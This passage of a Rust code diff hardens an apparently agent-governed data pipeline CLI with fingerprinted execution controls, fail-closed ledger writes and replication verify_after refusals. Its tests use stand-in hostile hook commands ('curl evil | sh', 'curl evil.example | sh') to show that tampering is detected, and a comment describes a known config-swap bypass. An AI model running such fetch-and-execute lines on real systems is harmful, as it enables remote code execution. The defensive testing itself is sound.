             expected: self.expected_ir_fingerprint.clone(),
             config_identity: config_policy_identity(cfg),
             governance_identity: governance_policy_identity(cfg),
+            exec_control_identity: execution_control_identity(
+                cfg,
+                self.config_path.parent().unwrap_or_else(|| Path::new(".")),
+            ),
             resolved_mask: cfg.resolve_mask_for_env(env),
             reviewed_source_schemas: self.reviewed_source_schemas.clone(),
             plan_id: self.plan_id.to_string(),
@@ -4028,8 +4144,8 @@ auto_create_schemas = true
         let models: Vec<rocky_core::models::Model> = Vec::new();
         let extras = super::ExecutionExtras::default();
         assert_ne!(
-            super::execution_ir_fingerprint(&models, &id_a, "", &extras),
-            super::execution_ir_fingerprint(&models, &snow, "", &extras),
+            super::execution_ir_fingerprint(&models, &id_a, "", "", &extras),
+            super::execution_ir_fingerprint(&models, &snow, "", "", &extras),
             "the routing identity must change the execution fingerprint"
         );
 
@@ -4135,12 +4251,13 @@ auto_create_schemas = true
     fn exec_fingerprint_gate_fail_closed_semantics() {
         let m: Vec<rocky_core::models::Model> = Vec::new();
         let extras = super::ExecutionExtras::default();
-        let expected = super::execution_ir_fingerprint(&m, "c", "g", &extras).unwrap();
+        let expected = super::execution_ir_fingerprint(&m, "c", "g", "", &extras).unwrap();
         // Genuinely-legacy (no fingerprint, not required) → allowed.
         super::ExecFingerprintGate {
             expected: None,
             config_identity: "c".to_string(),
             governance_identity: "g".to_string(),
+            exec_control_identity: String::new(),
             resolved_mask: std::collections::BTreeMap::new(),
             reviewed_source_schemas: None,
             plan_id: "p".to_string(),
@@ -4153,6 +4270,7 @@ auto_create_schemas = true
             expected: None,
             config_identity: "c".to_string(),
             governance_identity: "g".to_string(),
+            exec_control_identity: String::new(),
             resolved_mask: std::collections::BTreeMap::new(),
             reviewed_source_schemas: None,
             plan_id: "p".to_string(),
@@ -4166,6 +4284,7 @@ auto_create_schemas = true
             expected: Some(expected.clone()),
             config_identity: "c".to_string(),
             governance_identity: "g".to_string(),
+            exec_control_identity: String::new(),
             resolved_mask: std::collections::BTreeMap::new(),
             reviewed_source_schemas: None,
             plan_id: "p".to_string(),
@@ -4178,6 +4297,7 @@ auto_create_schemas = true
                 expected: Some(expected.clone()),
                 config_identity: "DIFFERENT".to_string(),
                 governance_identity: "g".to_string(),
+                exec_control_identity: String::new(),
                 resolved_mask: std::collections::BTreeMap::new(),
                 reviewed_source_schemas: None,
                 plan_id: "p".to_string(),
@@ -4193,6 +4313,7 @@ auto_create_schemas = true
                 expected: Some(expected),
                 config_identity: "c".to_string(),
                 governance_identity: "DIFFERENT".to_string(),
+                exec_control_identity: String::new(),
                 resolved_mask: std::collections::BTreeMap::new(),
                 reviewed_source_schemas: None,
                 plan_id: "p".to_string(),
@@ -4201,6 +4322,98 @@ auto_create_schemas = true
             .verify(&m, &extras)
             .is_err(),
             "a governance-identity change must refuse"
+        );
+        // #1095: an EXECUTION-CONTROL identity change (skip/reuse/resilience or a
+        // governed hook) must refuse too — bound into the fingerprint alongside
+        // routing/governance.
+        let expected_ec = super::execution_ir_fingerprint(&m, "c", "g", "", &extras).unwrap();
+        assert!(
+            super::ExecFingerprintGate {
+                expected: Some(expected_ec),
+                config_identity: "c".to_string(),
+                governance_identity: "g".to_string(),
+                exec_control_identity: "DIFFERENT".to_string(),
+                resolved_mask: std::collections::BTreeMap::new(),
+                reviewed_source_schemas: None,
+                plan_id: "p".to_string(),
+                require: true,
+            }
+            .verify(&m, &extras)
+            .is_err(),
+            "an execution-control identity change must refuse (#1095)"
+        );
+    }
+
+    /// #1095 closure: [`execution_control_identity`] binds `[run]`/`[reuse]`/
+    /// `[resilience]` AND content-addresses `[hook]` scripts, so a post-plan edit
+    /// to any of them moves the identity (→ the governed apply refuses at the
+    /// choke-point), while an UNCHANGED project is byte-stable (no false-refuse).
+    #[test]
+    fn execution_control_identity_binds_config_and_content_addresses_hooks() {
+        let dir = tempfile::tempdir().unwrap();
+        let script = dir.path().join("notify.sh");
+        std::fs::write(&script, b"#!/bin/sh\necho reviewed\n").unwrap();
+        let root = dir.path();
+        let load = |body: &str| -> rocky_core::config::RockyConfig {
+            let p = root.join("rocky.toml");
+            std::fs::write(&p, body).unwrap();
+            rocky_core::config::load_rocky_config(&p).unwrap()
+        };
+        let base_toml = "[adapter]\ntype = \"duckdb\"\npath = \"x.duckdb\"\n\n\
+            [pipeline.p]\ntype = \"transformation\"\nmodels = \"models/**\"\n\n\
+            [pipeline.p.target]\nadapter = \"default\"\n\n\
+            [run]\nskip_unchanged = false\n\n\
+            [hook.on_pipeline_start]\ncommand = \"notify.sh\"\n";
+        let base = super::execution_control_identity(&load(base_toml), root);
+
+        // Unchanged config + unchanged script → byte-stable (no false-refuse).
+        assert_eq!(
+            base,
+            super::execution_control_identity(&load(base_toml), root),
+            "an unchanged project must produce a stable execution-control identity"
+        );
+
+        // (a) `[run].skip_unchanged` flip → moves (it arms the post-fingerprint
+        // skip gate, so a reviewed-to-build plan could otherwise become a no-op).
+        let skip = base_toml.replace("skip_unchanged = false", "skip_unchanged = true");
+        assert_ne!(
+            base,
+            super::execution_control_identity(&load(&skip), root),
+            "a [run].skip_unchanged flip must move the identity"
+        );
+
+        // (b) `[reuse]` toggle → moves.
+        let reuse = format!("{base_toml}\n[reuse]\nenabled = true\n");
+        assert_ne!(
+            base,
+            super::execution_control_identity(&load(&reuse), root),
+            "a [reuse] toggle must move the identity"
+        );
+
+        // (c) `[resilience]` change → moves.
+        let resil = format!("{base_toml}\n[resilience]\ntransient_max_retries = 9\n");
+        assert_ne!(
+            base,
+            super::execution_control_identity(&load(&resil), root),
+            "a [resilience] change must move the identity"
+        );
+
+        // (d) hook COMMAND edit → moves (the classic post-review arbitrary command).
+        let cmd = base_toml.replace("command = \"notify.sh\"", "command = \"curl evil | sh\"");
+        assert_ne!(
+            base,
+            super::execution_control_identity(&load(&cmd), root),
+            "a [hook] command edit must move the identity"
+        );
+
+        // (e) referenced SCRIPT CONTENTS edit, command string UNCHANGED → moves.
+        // Binding only the command string would miss this — content-addressing
+        // (blake3 of the script bytes) catches it. This is the #1095(c) core.
+        std::fs::write(&script, b"#!/bin/sh\ncurl evil.example | sh\n").unwrap();
+        assert_ne!(
+            base,
+            super::execution_control_identity(&load(base_toml), root),
+            "editing a hook's referenced script CONTENTS must move the identity"
         );
     }
 

--- a/engine/crates/rocky-cli/src/commands/apply.rs
+++ b/engine/crates/rocky-cli/src/commands/apply.rs
@@ -990,6 +990,20 @@ pub fn evaluate_apply_policy_with_policy(
         Err(gate) => return gate,
     };
 
+    // Finding 6: when the policy uses autonomy budgets or `verify_after`, the
+    // decision rows are durability-CRITICAL — the plain rule decision written here
+    // pairs with the later verify-after custody row to burn the budget
+    // (`policy::budget_failures_in_window` needs BOTH). A silently-dropped decision
+    // row (write-handle unavailable under advisory-lock contention, or a write
+    // error) means a failed apply never burns the budget and a later agent action
+    // auto-allows. For such policies the ledger open + write are FAIL-CLOSED. For
+    // ordinary policies (no budget / no verify_after) the write stays best-effort,
+    // so an audit-row hiccup never blocks an apply (no availability regression).
+    let budget_relevant = policy
+        .rules
+        .iter()
+        .any(|r| r.autonomy_budget.is_some() || !r.verify_after.is_empty());
+
     // Snapshot the decision ledger *before* this apply writes any rows, so the
     // dynamic breakers (autonomy-budget burn, active freezes) reflect only
     // prior history. The snapshot is taken through `open_read_only` FIRST:
@@ -1002,11 +1016,23 @@ pub fn evaluate_apply_policy_with_policy(
         .ok()
         .and_then(|reader| reader.list_policy_decisions().ok());
 
-    // Best-effort ledger handle for the decision-row writes. A failure to open
-    // for writing (e.g. a concurrent writer's advisory lock) must not fail the
-    // apply — the decision is computed regardless; only the audit write is
-    // skipped.
-    let ledger = StateStore::open(state_path).ok();
+    // Ledger write handle. For a budget-relevant policy the handle MUST be
+    // obtainable — retry briefly on transient advisory-lock contention, then fail
+    // closed (Deny) if still unavailable. Otherwise best-effort (a failed open
+    // just skips the audit write).
+    let ledger = if budget_relevant {
+        match open_ledger_with_retry(state_path) {
+            Ok(store) => Some(store),
+            Err(e) => {
+                return fail_closed_budget_gate(
+                    touched,
+                    &format!("the decision ledger could not be opened for writing ({e})"),
+                );
+            }
+        }
+    } else {
+        StateStore::open(state_path).ok()
+    };
 
     // Rare fallback: the read-only open lost a transient redb open race but a
     // write handle succeeded — snapshot through it rather than reading nothing.
@@ -1016,7 +1042,11 @@ pub fn evaluate_apply_policy_with_policy(
     let snapshot_unreadable = prior_snapshot.is_none();
     let prior_decisions: Vec<PolicyDecisionRecord> = prior_snapshot.unwrap_or_default();
 
-    evaluate_apply_policy_core(
+    // Tracks a failed budget-relevant decision-row write so we can fail closed
+    // after the evaluation loop (the record sink returns `()`).
+    let budget_write_failed = std::cell::Cell::new(false);
+
+    let gate = evaluate_apply_policy_core(
         &policy,
         plan_id,
         principal,
@@ -1025,17 +1055,81 @@ pub fn evaluate_apply_policy_with_policy(
         &prior_decisions,
         snapshot_unreadable,
         |record| {
-            if let Some(store) = &ledger
-                && let Err(e) = store.record_policy_decision(record)
-            {
-                warn!(
-                    target: "rocky::policy",
-                    error = %e,
-                    "failed to record policy decision to the ledger (continuing)"
-                );
+            match &ledger {
+                Some(store) => {
+                    if let Err(e) = store.record_policy_decision(record) {
+                        if budget_relevant {
+                            budget_write_failed.set(true);
+                            warn!(
+                                target: "rocky::policy",
+                                error = %e,
+                                "fail-closed: could not persist a budget-relevant decision row"
+                            );
+                        } else {
+                            warn!(
+                                target: "rocky::policy",
+                                error = %e,
+                                "failed to record policy decision to the ledger (continuing)"
+                            );
+                        }
+                    }
+                }
+                // A budget-relevant policy with no write handle is impossible here
+                // (we fail closed above), but guard defensively.
+                None if budget_relevant => budget_write_failed.set(true),
+                None => {}
             }
         },
-    )
+    );
+
+    if budget_relevant && budget_write_failed.get() {
+        return fail_closed_budget_gate(
+            touched,
+            "a budget-relevant decision row could not be persisted",
+        );
+    }
+    gate
+}
+
+/// Open the decision ledger for writing with a bounded retry on transient
+/// advisory-lock contention (a concurrent run briefly holding the writer lock).
+/// Mirrors the download-publish lock retry. Fail-closed: propagates the last
+/// error after the retries are exhausted.
+fn open_ledger_with_retry(state_path: &Path) -> Result<StateStore, rocky_core::state::StateError> {
+    const MAX_ATTEMPTS: u32 = 5;
+    let mut last: Option<rocky_core::state::StateError> = None;
+    for attempt in 1..=MAX_ATTEMPTS {
+        match StateStore::open(state_path) {
+            Ok(store) => return Ok(store),
+            Err(e) => {
+                last = Some(e);
+                if attempt < MAX_ATTEMPTS {
+                    std::thread::sleep(std::time::Duration::from_millis(20 * u64::from(attempt)));
+                }
+            }
+        }
+    }
+    Err(last.expect("retry loop runs at least once"))
+}
+
+/// A fail-closed `Deny` for a budget-relevant decision whose ledger row could
+/// not be durably persisted — the autonomy-budget / verify_after pair must be
+/// durable, so the mutation is refused rather than proceeding with an incomplete
+/// budget trail (finding 6).
+fn fail_closed_budget_gate(touched: &BTreeMap<String, PolicyCapability>, why: &str) -> PolicyGate {
+    PolicyGate::Deny {
+        model: touched
+            .keys()
+            .next()
+            .cloned()
+            .unwrap_or_else(|| "*".to_string()),
+        rule_id: None,
+        reason: format!(
+            "fail-closed: {why} — the autonomy-budget / verify_after decision pair must be \
+             durable so a failed apply burns the budget, so this mutation is refused. Retry when \
+             the state store is not contended."
+        ),
+    }
 }
 
 /// Ledger-through-a-held-handle variant of [`evaluate_apply_policy`].
@@ -1514,6 +1608,28 @@ impl ExecutionExtras {
 /// [`governance_policy_identity`], hashed into the execution fingerprint only —
 /// never here — so an env-var-templated advisory value cannot cause a
 /// cross-process routing false-refuse (finding #5).
+///
+/// # KNOWN LIMITATION — config-swap TOCTOU (findings 1–4, tracked follow-up)
+///
+/// `config_policy_identity` binds only **adapters + pipelines** (routing/
+/// destination). It does **not** bind `[policy]` or `[state]`. Meanwhile the
+/// governed `run` / `promote` / `propose` EXECUTION paths **re-read `rocky.toml`
+/// from disk** (see the seam note on [`GovernedRunContext::verify_routing_identity`]
+/// and `commands::run::run`'s L1212 snapshot): the apply-time freeze/policy gate
+/// reads the config once, and execution reads it again. An attacker with
+/// filesystem write access who swaps the on-disk `[policy]` / `[state]` block
+/// **between** the apply gate and execution can therefore bypass a freeze or a
+/// deny rule (or redirect the `[state]` backend) for those paths — the swap moves
+/// fields that are NOT in this routing identity, so the fingerprint gate does not
+/// catch it. The single-snapshot threading in this crate closes the swap **within
+/// each governed decision function** (the gate + guard + `verify_after` +
+/// models-dir all read one snapshot), but does not yet extend that snapshot
+/// through the `run()` execution engine. The sound fix — execute every governed
+/// mutation from the apply-verified config snapshot (thread the `&RockyConfig`
+/// through `execute_run_plan` → `run()`), or bind `[policy]`/`[state]` into the
+/// pre-mutation execution identity — is a tracked design follow-up, out of scope
+/// here. Mitigating factor: the threat requires local filesystem write access to
+/// `rocky.toml` during the apply window.
 pub(crate) fn config_policy_identity(cfg: &rocky_core::config::RockyConfig) -> String {
     let adapters: BTreeMap<&str, serde_json::Value> = cfg
         .adapters
@@ -1781,6 +1897,16 @@ impl GovernedRunContext<'_> {
     /// `a.duckdb`→`b.duckdb`) is refused before a single DDL executes. A
     /// genuinely-legacy plan (`!require` and no stored identity) is allowed
     /// through; a NEW plan with a missing identity is refused (#7).
+    ///
+    /// KNOWN LIMITATION — config-swap TOCTOU (findings 1–4, tracked follow-up):
+    /// this gate binds ROUTING only ([`config_policy_identity`] = adapters +
+    /// pipelines), not `[policy]` / `[state]`. This governed EXECUTION seam
+    /// re-reads `rocky.toml` (the `cfg` here is `run`'s own re-read snapshot, not
+    /// the apply-time gate's), so an on-disk `[policy]`/`[state]` swap performed
+    /// between the apply gate and here is NOT caught — see the full note on
+    /// [`config_policy_identity`]. Closing it fully (execute from the
+    /// apply-verified snapshot, or fingerprint `[policy]`/`[state]`) is a tracked
+    /// design follow-up.
     pub(crate) fn verify_routing_identity(
         &self,
         cfg: &rocky_core::config::RockyConfig,
@@ -1846,7 +1972,29 @@ impl GovernedRunContext<'_> {
             &models_dir,
             ledger,
         );
-        apply_policy_gate(self.root, self.plan_id, gate)
+        apply_policy_gate(self.root, self.plan_id, gate)?;
+
+        // Finding 7: replication pipelines have NO post-run check substrate — a
+        // replication apply supplies no `verify_after` run id and nothing runs or
+        // records the named checks. A rule's required `verify_after` checks are
+        // contractually fail-closed (an absent check halts), so silently ALLOWING
+        // an unverified replication mutation under a rule that demands checks is a
+        // policy bypass. Refuse instead: if the matched allow-rule(s) for these
+        // targets require any `verify_after`, fail closed with a clear message.
+        let required =
+            required_verify_after(cfg.policy.as_ref(), self.principal, &touched, &models_dir);
+        if !required.is_empty() {
+            bail!(
+                "refusing governed replication apply for plan '{}': the matched policy rule \
+                 requires verify_after checks [{}], but `verify_after` is NOT supported for \
+                 replication pipelines — there is no post-run check substrate to run or record \
+                 them, so the mutation could not be verified. Remove `verify_after` from the \
+                 matching rule, or move these targets to a transformation pipeline.",
+                self.plan_id,
+                required.join(", ")
+            );
+        }
+        Ok(())
     }
 }
 
@@ -2070,7 +2218,11 @@ fn run_verify_after(
         return Ok(());
     }
 
-    let store = StateStore::open(state_path)
+    // Finding 6: `run_verify_after` only runs when checks are required, so its
+    // custody row is ALWAYS budget/verify-relevant. Open the ledger fail-closed
+    // with a bounded retry on advisory-lock contention (rather than a single
+    // best-effort open) so the custody half of the budget-burn pair is durable.
+    let store = open_ledger_with_retry(state_path)
         .with_context(|| format!("failed to open state store at {}", state_path.display()))?;
 
     // Resolve *this apply's own* run by id (not "latest"). `None` means no run
@@ -2138,13 +2290,16 @@ fn run_verify_after(
         verify_after: required.to_vec(),
         auto_apply: None,
     };
-    if let Err(e) = store.record_policy_decision(&record) {
-        warn!(
-            target: "rocky::policy",
-            error = %e,
-            "failed to record verify_after custody entry to the ledger (continuing)"
-        );
-    }
+    // Finding 6: FAIL-CLOSED — the verify custody row is the budget-burning half
+    // of the pair, so a write failure must abort (not warn-and-continue) rather
+    // than silently leave the failed apply un-burnable.
+    store.record_policy_decision(&record).with_context(|| {
+        format!(
+            "fail-closed: could not persist the verify_after custody row for plan '{plan_id}' — \
+             the autonomy-budget pair would be incomplete, so a later agent action could \
+             auto-allow. Retry when the state store is not contended."
+        )
+    })?;
 
     if passed {
         eprintln!(
@@ -2495,7 +2650,13 @@ async fn run_apply_backfill_plan(
         )
     })?;
 
-    crate::commands::run::execute_backfill_set(
+    // Finding 5: a backfill MUTATES the warehouse + local ledger (run/artifact/
+    // provenance rows) as it executes, so a mid-run failure can still have
+    // committed state. CAPTURE the result (don't `?` it) and ALWAYS run the
+    // fail-closed upload-after before returning — otherwise a failed backfill
+    // leaves its partial mutations local-only, and the next run's start-download
+    // silently reverts them. The upload is not gated on success.
+    let exec_result = crate::commands::run::execute_backfill_set(
         config_path,
         &rocky_cfg,
         state_path,
@@ -2506,13 +2667,13 @@ async fn run_apply_backfill_plan(
         output_json,
     )
     .await
-    .with_context(|| format!("rocky apply backfill plan '{plan_id}' failed"))?;
+    .with_context(|| format!("rocky apply backfill plan '{plan_id}' failed"));
 
-    // Finding 2c (upload-after): the backfill wrote artifact/run/provenance rows
-    // to local state; push them to the remote backend (fail-closed) so the next
-    // run's start-download does not silently revert the recovery. Runs only after
-    // a successful backfill.
-    upload_remote_ledger_fail_closed(Some(&rocky_cfg), state_path, "backfill apply").await
+    // Finding 2c + 5 (upload-after, unconditional): push whatever the backfill
+    // wrote to local state to the remote backend (fail-closed) so it is durable.
+    upload_remote_ledger_fail_closed(Some(&rocky_cfg), state_path, "backfill apply").await?;
+
+    exec_result
 }
 
 /// Apply a `PlanKind::Replication` plan by re-running discovery, asserting
@@ -5016,6 +5177,96 @@ effect = "allow"
         let targets: BTreeSet<String> = ["raw_orders".to_string()].into_iter().collect();
         ctx.gate_replication_targets(&targets, &ledger, &loaded_cfg)
             .expect("no [policy] block ⇒ replication gate is a no-op");
+        Ok(())
+    }
+
+    /// Finding 7: replication pipelines have NO post-run verify substrate, so a
+    /// governed replication apply whose matched allow-rule requires `verify_after`
+    /// must be REFUSED (not silently allowed as an unverified mutation).
+    #[test]
+    fn replication_gate_refuses_verify_after() -> anyhow::Result<()> {
+        let dir = tempfile::tempdir()?;
+        // An `allow` rule that ALSO demands a post-apply check.
+        let config = write_config(
+            dir.path(),
+            r#"
+[[policy.rules]]
+principal = "agent"
+capability = "apply"
+scope = { any = true }
+effect = "allow"
+verify_after = ["row_count"]
+"#,
+        )?;
+        let loaded_cfg = rocky_core::config::load_rocky_config(&config)?;
+        let state = dir.path().join("state.redb");
+        let ledger = StateStore::open(&state)?;
+        let ctx = super::GovernedRunContext {
+            principal: PolicyPrincipal::Agent,
+            plan_id: "plan_x",
+            root: dir.path(),
+            config_path: &config,
+            expected_ir_fingerprint: None,
+            expected_config_identity: None,
+            require_fingerprint: false,
+            reviewed_source_schemas: None,
+            expects_models: true,
+        };
+        let targets: BTreeSet<String> = ["raw_orders".to_string()].into_iter().collect();
+        let err = ctx
+            .gate_replication_targets(&targets, &ledger, &loaded_cfg)
+            .expect_err(
+                "a replication apply under a verify_after rule must be refused (finding 7)",
+            );
+        assert!(
+            err.to_string()
+                .contains("verify_after` is NOT supported for replication"),
+            "the refusal must name the replication verify_after limitation; got: {err}"
+        );
+        Ok(())
+    }
+
+    /// Finding 6: for a budget-relevant policy (a rule with `autonomy_budget` or
+    /// `verify_after`), the decision-row write is FAIL-CLOSED — if the ledger
+    /// write handle is unavailable (a concurrent writer holds the advisory lock),
+    /// the gate DENIES rather than silently dropping the budget-pair row.
+    #[test]
+    fn budget_relevant_decision_write_is_fail_closed_under_contention() -> anyhow::Result<()> {
+        let dir = tempfile::tempdir()?;
+        let config = write_config(
+            dir.path(),
+            r#"
+[[policy.rules]]
+principal = "agent"
+capability = "apply"
+scope = { any = true }
+effect = "allow"
+autonomy_budget = { failures = 3, window = "7d" }
+"#,
+        )?;
+        let policy = rocky_core::config::load_rocky_config(&config)?.policy;
+        let state = dir.path().join("state.redb");
+        let mut touched = BTreeMap::new();
+        touched.insert("m".to_string(), PolicyCapability::Apply);
+
+        // Hold the writer lock, as a concurrent run would — the decision-row write
+        // handle is unavailable, so the budget-pair row cannot be persisted.
+        let held = StateStore::open(&state)?;
+        let gate = super::evaluate_apply_policy_with_policy(
+            policy.as_ref(),
+            "plan_x",
+            PolicyPrincipal::Agent,
+            &touched,
+            &dir.path().join("models"),
+            &state,
+        );
+        drop(held);
+        assert!(
+            matches!(&gate, PolicyGate::Deny { reason, .. }
+                if reason.contains("fail-closed") && reason.contains("budget")),
+            "a budget-relevant decision whose row can't be persisted must fail closed with a \
+             budget-pair reason; got {gate:?}"
+        );
         Ok(())
     }
 

--- a/engine/crates/rocky-cli/src/commands/apply.rs
+++ b/engine/crates/rocky-cli/src/commands/apply.rs
@@ -244,8 +244,9 @@ async fn run_apply_run_plan(
     let touched = touched_models_for_run(&plan, &executable);
     let principal = plan.enforcement_principal(runtime_principal);
     // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
-    // the gate reads it, so a cross-pod freeze is enforced (fail-closed).
-    sync_remote_ledger_before_gate(config_path, state_path).await?;
+    // the gate reads it, so a cross-pod freeze is enforced (fail-closed). Skipped
+    // when the gate won't read the ledger (no policy / empty touched — finding 8).
+    sync_remote_ledger_before_gate(config_path, state_path, &touched).await?;
     let gate = evaluate_apply_policy(
         config_path,
         plan_id,
@@ -738,17 +739,35 @@ fn model_attributes(models_dir: &Path) -> BTreeMap<String, ModelAttributes> {
 }
 
 /// Resolve the `[state]` backend for a governed apply seam, returning the config
-/// ONLY when the backend is a REMOTE one whose authoritative ledger must be
-/// pulled before the freeze/budget gate reads the LOCAL state file.
+/// ONLY when the pre-gate remote sync is actually warranted — i.e. all of:
 ///
-/// `None` for the Local backend, or when the config cannot be loaded — a genuine
-/// config error is surfaced by the seam's own fail-closed handling
+/// - `touched` is **non-empty** (an empty set short-circuits
+///   [`evaluate_apply_policy`] to `Allow` with NO ledger read), AND
+/// - a `[policy]` block is configured (`cfg.policy.is_some()`; without one the
+///   gate returns `NotConfigured` and reads NO freeze ledger), AND
+/// - the backend is REMOTE (Local needs no transfer).
+///
+/// When the gate will not consult the `policy_decisions` ledger, pulling remote
+/// state buys nothing and its fail-closed abort would be a pure availability
+/// regression for a valid human Run/Promote plan on a backend blip (finding 8) —
+/// so this returns `None` and the caller skips the download entirely.
+///
+/// `None` is also returned when the config cannot be loaded — a genuine config
+/// error is surfaced by the seam's own fail-closed handling
 /// ([`bail_on_config_load_error`] on the gc/backfill paths, or the run path's
 /// re-load), so there is no remote object to pull in that case.
-fn remote_state_backend_for_gate(config_path: &Path) -> Option<rocky_core::config::StateConfig> {
-    let state_cfg = rocky_core::config::load_rocky_config(config_path)
-        .map(|cfg| cfg.state)
-        .ok()?;
+fn remote_state_backend_for_gate(
+    config_path: &Path,
+    touched: &BTreeMap<String, PolicyCapability>,
+) -> Option<rocky_core::config::StateConfig> {
+    // Empty touched set ⇒ the gate is a no-op Allow, no ledger read.
+    if touched.is_empty() {
+        return None;
+    }
+    let cfg = rocky_core::config::load_rocky_config(config_path).ok()?;
+    // No `[policy]` block ⇒ the gate returns NotConfigured, no ledger read.
+    cfg.policy.as_ref()?;
+    let state_cfg = cfg.state;
     (!matches!(state_cfg.backend, StateBackend::Local)).then_some(state_cfg)
 }
 
@@ -759,10 +778,18 @@ fn remote_state_backend_for_gate(config_path: &Path) -> Option<rocky_core::confi
 /// `policy_decisions` ledger that `rocky run` downloads at start and uploads at
 /// end. A governed apply gates BEFORE any such run-download, so without this a
 /// freeze recorded by another pod would be invisible and the gate would clear
-/// against a stale local snapshot (finding 4-apply). No-op for the Local
-/// backend. Fail-closed: a remote download failure aborts the apply.
-async fn sync_remote_ledger_before_gate(config_path: &Path, state_path: &Path) -> Result<()> {
-    let Some(state_cfg) = remote_state_backend_for_gate(config_path) else {
+/// against a stale local snapshot (finding 4-apply). No-op unless the gate will
+/// actually read the ledger (see [`remote_state_backend_for_gate`] — finding 8).
+/// Fail-closed: when the sync IS warranted, a remote download failure aborts.
+///
+/// `pub(crate)` so the `restore` seam reuses the exact same guarded, fail-closed
+/// pre-gate sync (finding 1).
+pub(crate) async fn sync_remote_ledger_before_gate(
+    config_path: &Path,
+    state_path: &Path,
+    touched: &BTreeMap<String, PolicyCapability>,
+) -> Result<()> {
+    let Some(state_cfg) = remote_state_backend_for_gate(config_path, touched) else {
         return Ok(());
     };
     rocky_core::state_sync::download_state(&state_cfg, state_path)
@@ -779,9 +806,14 @@ async fn sync_remote_ledger_before_gate(config_path: &Path, state_path: &Path) -
 /// gate ([`gate_promote_plan`]), which is reached from two async entry points
 /// (`rocky apply <promote>` and `rocky branch promote --plan`). Driving the
 /// download on a dedicated runtime inside the shared gate closes BOTH entry
-/// points without threading an async download through each caller.
-fn sync_remote_ledger_before_gate_blocking(config_path: &Path, state_path: &Path) -> Result<()> {
-    let Some(state_cfg) = remote_state_backend_for_gate(config_path) else {
+/// points without threading an async download through each caller. Same
+/// finding-8 guard: skips the download unless the gate will read the ledger.
+fn sync_remote_ledger_before_gate_blocking(
+    config_path: &Path,
+    state_path: &Path,
+    touched: &BTreeMap<String, PolicyCapability>,
+) -> Result<()> {
+    let Some(state_cfg) = remote_state_backend_for_gate(config_path, touched) else {
         return Ok(());
     };
     crate::commands::policy::block_on_state_sync(rocky_core::state_sync::download_state(
@@ -1734,13 +1766,14 @@ pub(crate) fn gate_promote_plan(
     promote_plan: &PromotePlan,
     state_path: &Path,
 ) -> Result<()> {
+    let promote_models_dir = resolve_config_models_dir(config_path);
+    let touched = touched_models_for_promote(promote_plan, &promote_models_dir);
     // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
     // the gate reads it, so a cross-pod freeze is enforced. Placed inside the
     // shared gate so BOTH promote entry points (`rocky apply <promote>` and
-    // `rocky branch promote --plan`) are covered. Fail-closed.
-    sync_remote_ledger_before_gate_blocking(config_path, state_path)?;
-    let promote_models_dir = resolve_config_models_dir(config_path);
-    let touched = touched_models_for_promote(promote_plan, &promote_models_dir);
+    // `rocky branch promote --plan`) are covered. Fail-closed, but skipped when
+    // the gate won't read the ledger (no policy / empty touched — finding 8).
+    sync_remote_ledger_before_gate_blocking(config_path, state_path, &touched)?;
     let gate = evaluate_apply_policy(
         config_path,
         plan_id,
@@ -2081,8 +2114,9 @@ async fn run_apply_ai_authored_plan(
     let touched = touched_models_for_run(&plan, &executable);
     let principal = plan.enforcement_principal(runtime_principal);
     // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
-    // the gate reads it, so a cross-pod freeze is enforced (fail-closed).
-    sync_remote_ledger_before_gate(config_path, state_path).await?;
+    // the gate reads it, so a cross-pod freeze is enforced (fail-closed). Skipped
+    // when the gate won't read the ledger (no policy / empty touched — finding 8).
+    sync_remote_ledger_before_gate(config_path, state_path, &touched).await?;
     let gate = evaluate_apply_policy(
         config_path,
         plan_id,
@@ -2200,8 +2234,9 @@ async fn run_apply_backfill_plan(
     // an informational hint — gate on it directly.
     let touched = touched_models_for_run(&plan, &run_plan.models);
     // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
-    // the gate reads it, so a cross-pod freeze is enforced (fail-closed).
-    sync_remote_ledger_before_gate(config_path, state_path).await?;
+    // the gate reads it, so a cross-pod freeze is enforced (fail-closed). Skipped
+    // when the gate won't read the ledger (no policy / empty touched — finding 8).
+    sync_remote_ledger_before_gate(config_path, state_path, &touched).await?;
     let gate = evaluate_apply_policy(
         config_path,
         plan_id,
@@ -3226,6 +3261,63 @@ default_agent_effect = "require_review"
         let path = dir.join("rocky.toml");
         std::fs::write(&path, toml)?;
         Ok(path)
+    }
+
+    /// Finding 8: the pre-gate remote sync must run ONLY when the gate will
+    /// actually read the freeze/budget ledger — otherwise a backend blip would
+    /// falsely abort a valid human Run/Promote plan. `remote_state_backend_for_gate`
+    /// returns `Some` (sync warranted) only for {non-empty touched} ∧ {policy
+    /// configured} ∧ {remote backend}; `None` (skip the download) otherwise.
+    #[test]
+    fn remote_state_backend_for_gate_only_syncs_when_ledger_is_read() -> anyhow::Result<()> {
+        use std::collections::BTreeMap;
+        let dir = tempfile::tempdir()?;
+
+        let mut touched = BTreeMap::new();
+        touched.insert("orders".to_string(), PolicyCapability::Apply);
+        let empty: BTreeMap<String, PolicyCapability> = BTreeMap::new();
+
+        let state_s3 = "\n[state]\nbackend = \"s3\"\ns3_bucket = \"b\"\n";
+
+        // (1) policy + remote + non-empty touched ⇒ Some (sync warranted).
+        let remote_policy = dir.path().join("remote_policy.toml");
+        std::fs::write(&remote_policy, format!("{EMPTY_POLICY_TOML}{state_s3}"))?;
+        assert!(
+            super::remote_state_backend_for_gate(&remote_policy, &touched).is_some(),
+            "policy + remote backend + non-empty touched ⇒ pre-gate sync warranted"
+        );
+
+        // (1b) same config, EMPTY touched ⇒ None (gate short-circuits to Allow).
+        assert!(
+            super::remote_state_backend_for_gate(&remote_policy, &empty).is_none(),
+            "empty touched ⇒ the gate reads no ledger ⇒ no pre-gate sync (finding 8)"
+        );
+
+        // (2) remote backend but NO [policy] ⇒ None (gate returns NotConfigured).
+        let remote_nopolicy = dir.path().join("remote_nopolicy.toml");
+        std::fs::write(&remote_nopolicy, format!("{NO_POLICY_TOML}{state_s3}"))?;
+        assert!(
+            super::remote_state_backend_for_gate(&remote_nopolicy, &touched).is_none(),
+            "no [policy] block ⇒ gate returns NotConfigured, reads no ledger ⇒ no sync (finding 8)"
+        );
+
+        // (3) policy but LOCAL backend (no [state]) ⇒ None (nothing to pull).
+        let local_policy = dir.path().join("local_policy.toml");
+        std::fs::write(&local_policy, EMPTY_POLICY_TOML)?;
+        assert!(
+            super::remote_state_backend_for_gate(&local_policy, &touched).is_none(),
+            "local backend ⇒ nothing to download"
+        );
+
